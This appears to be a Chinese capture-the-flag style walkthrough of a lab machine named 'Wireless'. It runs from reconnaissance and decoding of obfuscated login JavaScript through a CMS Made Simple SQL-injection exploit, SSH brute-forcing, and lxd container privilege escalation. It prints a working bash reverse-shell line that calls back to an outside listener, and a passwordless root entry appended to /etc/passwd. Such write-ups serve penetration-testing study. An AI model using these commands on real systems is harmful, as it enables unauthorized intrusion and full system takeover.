Wireless

1
2
3
ip a

192.168.116.128

信息搜集

靶机发现

1
sudo nmap -sn  192.168.116.0/24

目标靶机 ip 为 192.168.116.132

端口发现

1
2
3
4
5
6
7
sudo nmap -sT --min-rate 10000 -p-  192.168.116.132 -oA nmapscan/ports

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
8080/tcp open  http-proxy

渗透打点

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
sudo nmap -sT -sV -sC -O -p22,80,8000,8080 192.168.116.132 -oA nmapscan/detail

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9d:db:a2:46:55:7b:55:67:e3:21:c6:73:62:8c:f8:36 (RSA)
|   256 7f:b7:da:42:ca:47:1e:86:56:65:83:e0:4f:c7:c4:b6 (ECDSA)
|_  256 4b:4c:5b:e7:75:dd:cb:46:41:a6:51:44:5e:47:2b:bd (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp open  http    Python http.server 3.5 - 3.10
|_http-title: VOIP Solutions
|_http-server-header: VOIP Server
8080/tcp open  http    Python http.server 3.5 - 3.10
|_http-title: 404 Not Found
|_http-server-header: Internal Server
MAC Address: 00:0C:29:9F:D0:20 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

UDP 扫描

1
2
3
sudo nmap -sU --top-ports 20 192.168.116.132 -oA nmapscan/udp

68/udp    open|filtered dhcpc

漏洞扫描

1
sudo nmap --script=vuln -p22,80,8000,8080 192.168.116.132 -oA nmapscan/vuln

渗透测试

80 web

一个apache的默认创建页面

目录爆破

没找到除了index之外的任何内容

8000 http-alt

看到邮箱是 jinmori@voip.in

1
2
3
4
/admin                                            
/login                                            
/logout                                 
/users

不登陆就始终是401的状态

准备跑一下sql和爆破, sql的时候会跳转去log路由,但还是一样的登陆框

然后看一下login的源码 有一个js

1
2
3
4
5
6
7
8
<script src="/static/js/login.js"></script>
<script>
// Get the modal
var modal = document.getElementById('id01');

// When the user clicks anywhere outside of the modal, close it

</script>

跟过去看看 login.js

1
2
3
4
5
6

/******************************************
    User Login
/****************************************** */

var delog = atob('dmFyIF8weGI1YzM9WyJceDZBXHg2OVx4NkVceDZEXHg2Rlx4NzJceDY5IiwiXHg1NFx4NjhceDY1XHgyMFx4NzFceDc1XHg2OVx4NjNceDZCXHgyMFx4NjJceDcyXHg2Rlx4NzdceDZFXHgyMFx4NjZceDZGXHg3OFx4MjBceDZBXHg3NVx4NkRceDcwXHg3M1x4MjBceDZGXHg3Nlx4NjVceDcyXHgyMFx4NzRceDY4XHg2NVx4MjBceDZDXHg2MVx4N0FceDc5XHgyMFx4NjRceDZGXHg2NyIsIlx4NjNceDY4XHg2MVx4NzJceDQzXHg2Rlx4NjRceDY1XHg0MVx4NzQiLCJceDY2XHg3Mlx4NkZceDZEXHg0M1x4NjhceDYxXHg3Mlx4NDNceDZGXHg2NFx4NjUiXTt2YXIgdT1fMHhiNWMzWzBdO3ZhciBzdHJpbmc9XzB4YjVjM1sxXTt2YXIgYT1zdHJpbmdbXzB4YjVjM1syXV0oMCk7dmFyIGI9c3RyaW5nW18weGI1YzNbMl1dKDM2KTt2YXIgYz1zdHJpbmdbXzB4YjVjM1syXV0oMik7dmFyIGQ9c3RyaW5nW18weGI1YzNbMl1dKDgpO3ZhciBlPXN0cmluZ1tfMHhiNWMzWzJdXSgxMyk7dmFyIGY9c3RyaW5nW18weGI1YzNbMl1dKDEyKTt2YXIgZz1zdHJpbmdbXzB4YjVjM1syXV0oMTQpO3ZhciBoPXN0cmluZ1tfMHhiNWMzWzJdXSg0MCk7dmFyIGk9c3RyaW5nW18weGI1YzNbMl1dKDEyKTt2YXIgcD1TdHJpbmdbXzB4YjVjM1szXV0oYSxiLGMsZCxlLGYsZyxoLGkp')

看上去是加密了 但是hash-identifier认不出来

问问ai, atob函数是base64解密用的 本地解密:

1
2
3
4
5
6
7
8
9
10
11
12
13
var _0xb5c3=["\x6A\x69\x6E\x6D\x6F\x72\x69","\x54\x68\x65\x20\x71\x75\x69\x63\x6B\x20\x62\x72\x6F\x77\x6E\x20\x66\x6F\x78\x20\x6A\x75\x6D\x70\x73\x20\x6F\x76\x65\x72\x20\x74\x68\x65\x20\x6C\x61\x7A\x79\x20\x64\x6F\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"];
var u=_0xb5c3[0];
var string=_0xb5c3[1];
var a=string[_0xb5c3[2]](0);
var b=string[_0xb5c3[2]](36);
var c=string[_0xb5c3[2]](2);
var d=string[_0xb5c3[2]](8);
var e=string[_0xb5c3[2]](13);
var f=string[_0xb5c3[2]](12);
var g=string[_0xb5c3[2]](14);
var h=string[_0xb5c3[2]](40);
var i=string[_0xb5c3[2]](12);
var p=String[_0xb5c3[3]](a,b,c,d,e,f,g,h,i)

console.log()

1
2
3
console.log(_0xb5c3)

console.log(p);

给出了一个提示信息

1
2
3
> Array ["jinmori", "The quick brown fox jumps over the lazy dog", "charCodeAt", "fromCharCode"]

> "Taekwondo"

使用凭据 jinmori / Taekwondo

成功以admin身份进入后台

log

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
VOIP LOGS
SMS-SUBMIT
AT+CMGS=118
079161789421834531000B915664141286F40019AA6800480069002000740068006500720065002E002E002E000A000A005300610074002000310034007400680020004E006F007600200032003000320030002000300038003A00300037002E0034003300200061006D002000280047004D0054002B0031002900610073

SMS-DELIVER
07912374151616F6240B912374374521F70000318011419314802A54747A0E4ACF41613768DA9C82A0C42AA88C0FB7E1EC32C82C7FB741F3F61C4EAEBBC6EF36

SMS-STATUS-REPORT
07912374151616F6067A0B912394460238F4318011411300803180114113008000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

SMS-SUBMIT
AT+CMGS=109
079161789421834501000B915664141286F4001B60004F007500720020006E0065007700200064006F006D00610069006E00200066006F007200200057006900460069002000740065007300740069006E006700200069007300200077006900720065006C006500730073002E0063006F006D0020

SMS-SUBMIT
AT+CMGS=98
07914400000000F001000B811000000000F0000061D7B4BCCC2ECFE7206A794E4FBBCF20F85B4E0FB341E939E80D2FBB41E6B71C14AED3D165373D3D0ED3CB64507D5E96CF41F437885E9ED341EFBA1C9476D3CB7277980D7297E9F7B77C0DBAA7E56576793E778DDF6D

SMS-SUBMIT
AT+CMGS=53
07914400000000F001000B811000000000F000002DD4F29C9E769F41D0B79C1E6683D0E139485C2EBB417374DA4C2F9341F43708FE96D375201C0C0703

消息内容以十六进制字符串表示, 需要解码

解码后

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Hi there...

Sat 14th Nov 2020 08:07.43 am (GMT+1)as

This is an SMS PDU example from smspdu.com

Status Report
SMSC:
+32475161616
Sender:
+32496420834
Message Ref#:
122
TimeStamp:
11/08/13 14:31:00 GMT +2
TimeStamp2:
11/08/13 14:31:00 GMT +7.75
Status Byte: 00

Our new domain for WiFi testing is wireless.com 

Wireless Testing portal is open for authenticated users to test our internal network wireless.com

Testing Portal has been shifted to port: 8080

给出了测试网站的端口和域名信息

绑定host文件

wireless.com

80 端口有信息了

1
2
Copyright 2004 - 2025 - CMS Made Simple
This site is powered by CMS Made Simple version 2.2.9

一个cms系统的默认初始页

有一些cve 但是尝试了一个upload的脚本失败了 原因是之前的凭据无法满足登陆条件

先对8080端口进行一个完整尝试

curl 8080 回显只有 Internal Portal v1

目录爆破也是空白 结合之前的思路 有域名之后想一下子域名的爆破

1
2
3
sudo gobuster vhost -u http://wireless.com:8080 --append-domain -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt

Found: testing.wireless.com:8080 Status: 200 [Size: 4085]

无法直接访问 需要更新hosts

test portol

一个login页面 之前的凭据依然无法登入, 爆破子目录仍然失败

现在有两个不同的web页面可以进行渗透尝试

由于cms系统2.2.9较旧 有历史CVE 攻击面更大 选择针对CMSMS进行渗透

CMSMS

1
2
CMS Made Simple < 2.2.10 - SQL Injection           | php/webapps/46635.py
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)| php/webapps/51600.txt

第二个也是python脚本 但是需要Authenticated, 经过尝试失败

尝试一下sql注入 看看能不能拿到用户信息

凭据爆破

这个是个碰撞admin密码的脚本 满足我的预期效果!

1
python2 46635.py -u http://wireless.com/ -cw /usr/share/wordlists/rockyou.txt

需要进行一个前置安装 ( 感谢px )

1
2
3
4
5
6
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py   
python2 get-pip.py
pip2 install setuptools wheel
pip2 install termcolor

python2 46635.py -u http://wireless.com/ -cw /usr/share/wordlists/rockyou.txt

拿到凭据

1
2
3
4
5
6
7
[+] Salt for password found: 551c92a536111490
[+] Username found: juniordev
[+] Email found: juniordev@wireless.com
[+] Password found: a25bb9e6782e7329c236d2538dd4f5ac
[+] Password cracked: passion

juniordev / passion

后台渗透

1
2
Security Issue
Warning: The installation assistant file: cmsms-2.2.9-install.php still exists in the root directory. As this could potentially be a security vulnerability, please delete it.

同时也有upload和user add

手动添加了admin用户后发现仍然无法在content file manager处进行file upload

发现拓展

user_agent Code to show the user’s user agent information

看上去是可执行代码 

1
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.116.128/443 0>&1'");

写入之后 有submit 和 run 选项 , run 成功反弹shell

提权

www-data

1
2
3
4
5
6
Linux VOIP 5.4.0-67-generic 
#75-Ubuntu SMP Fri Feb 19 18:03:38 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

root:x:0:0:root:/root:/bin/bash
coherer:x:1000:1000:coherer:/home/coherer:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false

非常奇怪 lxd用户无法被直接登陆?而且没有发现这个用户的home目录

之前还有一个8080的没有登陆 看看那里能不能直接反弹shell到用户 lxd

可以成功登入

testing bot

输入help可以列出可执行的命令 

1
Tools | Logs | Whoami | Clear | Questions

logs, 会下载到一个Network.data文件

里面有非常多的文字信息 可能是ldx的密码? 不可能 因为ldx不可登陆

那可能是coherer的密码?

将这个文件拆解成字典进行爆破尝试

1
2
3
4
cewl -d 3 http://testing.wireless.com:8080/static/Network.data > pass.txt

sudo hydra -l coherer -P pass.txt ssh://192.168.68.129
[22][ssh] host: 192.168.68.129   login: coherer   password: Induction

coherer

ssh 连接了user, 

1
2
3
4
uid=1000(coherer) gid=1000(coherer) groups=1000(coherer),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

cat local.txt 
4h1642b69b2a23bca3c5867u3f1ffd60

和预期很接近 但是仍然没有提权点 以及仍然无法提权ldx

因为没有这个用户home 所以研究一下它是干嘛的 同时发现config文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false

/var/snap/lxd/common$ cat config
# This file is auto-generated, do NOT manually edit
ceph_builtin=false
ceph_external=false
criu_enable=false
daemon_debug=false
daemon_group=lxd
daemon_syslog=false
lvm_external=false
lxcfs_loadavg=false
lxcfs_pidfd=false
lxcfs_cfs=false
openvswitch_builtin=false
shiftfs_enable=auto

没有看到passwd相关内容 问下AI

原来lxd是linux下管理容器的一个root进程

https://blog.csdn.net/YouthBelief/article/details/123548739

以及现在user是在lxd组内的 满足lxd提权条件

lxd提权

条件确认

1
2
3
4
5
6
7
8
which lxd
/snap/bin/lxd

which lxc
/snap/bin/lxc

id
uid=1000(coherer) gid=1000(coherer) groups=1000(coherer),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

同时ping命令可以执行 发现靶机出网

攻击机

1
2
3
4
5
6
git clone https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder   
sudo ./build-alpine

php -S 0:80

靶机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
wget http://192.168.68.128/alpine-v3.13-x86_64-20210218_0139.tar.gz

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias test
lxc init test test -c security.privileged=true
# (若报错 lxd init    一路回车之后再 )
# lxc init test test -c security.privileged=true
# 挂载磁盘
lxc config device add test test disk source=/ path=/mnt/root recursive=true

# 启动镜像并访问
lxc start test
lxc exec test /bin/sh
id
cd /mnt/root
ls
cd ./root
cat proof.txt

相当于把靶机文件挂载了一份镜像到本地来

在root下看到了一些其他文件

其中 build.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
expect \"Change the root password? \[Y/n\] \"

send \"y\r\"

expect \"New password: \"

send \"RootisnotthathardastheysayButNotEasyEither\r\"

RootisnotthathardastheysayButNotEasyEither

expect \"Disallow root login remotely? \[Y/n\] \"

send \"y\r\"

看看能不能ssh到coherer然后su root

RootisnotthathardastheysayButNotEasyEither

不能, 算是一个小彩蛋吧

但是发现在镜像中创建的txt文件同样出现在了靶机中

啊?

那就可以添加root用户了

1
echo 'choco::0:0:root:/root:/bin/bash' >> /mnt/root/etc/passwd